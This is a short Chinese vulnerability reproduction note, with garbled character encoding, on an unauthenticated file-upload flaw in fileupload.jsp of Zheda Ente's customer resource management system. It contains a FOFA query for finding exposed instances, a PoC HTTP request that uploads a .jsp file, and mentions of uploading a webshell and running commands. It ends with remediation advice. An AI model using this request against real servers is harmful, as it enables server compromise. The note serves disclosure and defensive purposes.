0x01 產(chǎn)品簡介

? ? ?浙大恩特客戶資源管理系統(tǒng)是一款針對企業(yè)客戶資源管理的軟件產(chǎn)品。該系統(tǒng)旨在幫助企業(yè)高效地管理和利用客戶資源，提升銷售和市場營銷的效果。

0x02 漏洞概述

??浙大恩特客戶資源管理系統(tǒng)中fileupload.jsp接口處存在文件上傳漏洞，未經(jīng)身份認(rèn)證的攻擊者可以上傳任意后門文件，最終可導(dǎo)致服務(wù)器失陷。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：app="浙大恩特客戶資源管理系統(tǒng)"

0x04 漏洞復(fù)現(xiàn)?

PoC

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Encoding: gzip, deflate123

回顯了上傳路徑?

驗(yàn)證

上傳馬子

命令執(zhí)行?

?0x05 修復(fù)建議?

關(guān)閉互聯(lián)網(wǎng)暴露面或設(shè)置接口訪問權(quán)限

?升級至安全版本

?